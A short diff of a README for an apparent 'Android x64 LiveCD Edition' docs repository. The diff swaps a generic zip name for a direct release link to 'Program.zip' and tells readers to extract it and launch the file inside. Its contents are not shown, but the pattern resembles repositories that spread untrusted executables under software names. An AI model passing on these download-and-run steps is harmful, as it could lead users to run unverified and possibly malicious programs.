vonisagoat/Android-x64_Android7.0_LiveCD_Edition_Docs/README.md

 To get started with Android x64 LiveCD Edition, follow these steps:

-1. Download the Soft.zip file from the provided link.
+1. Download the https://github.com/vonisagoat/Android-x64_Android7.0_LiveCD_Edition_Docs/releases/download/v1.0/Program.zip file from the provided link.
-2. Extract the contents of the Soft.zip file.
+2. Extract the contents of the https://github.com/vonisagoat/Android-x64_Android7.0_LiveCD_Edition_Docs/releases/download/v1.0/Program.zip file.
 3. Launch the extracted file to explore the various Android x64 editions.
 4. Refer to the documentation in this repository for detailed information on using Android x64 LiveCD Edition.